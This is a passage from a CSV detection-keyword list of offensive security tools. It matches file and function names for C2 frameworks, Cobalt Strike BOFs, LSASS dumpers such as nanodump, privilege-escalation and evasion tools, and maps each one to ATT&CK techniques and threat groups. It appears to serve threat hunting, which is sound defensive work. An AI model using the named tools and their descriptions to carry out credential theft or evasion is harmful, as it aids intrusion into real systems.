??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","570","129","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" +"*sullo/nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*SunloginClient_11.0.0.33162_X64.exe*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*superhedgy/AttackSurfaceMapper*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*SupportScam:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*suspended_run *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*svc_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SW2_GetSyscallNumber*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_GetSyscallNumber*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW2_HashSyscall*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_PopulateSyscallList*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_PopulateSyscallList*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW2_RVA2VA*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_RVA2VA*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW3_GetSyscallAddress*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*swaks --to * --from * --header *Subject: * --body * --server *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SwampThing.exe*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SWbemServicesImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SweetPotato.cna*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.csproj*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.exe*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SweetPotato.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - 
T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SweetPotato.ImpersonationToken*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.sln*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*swisskyrepo/SharpLAPS*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*swisskyrepo/SSRFmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*SwitchPriv.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*SxNade/Rudrastra*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
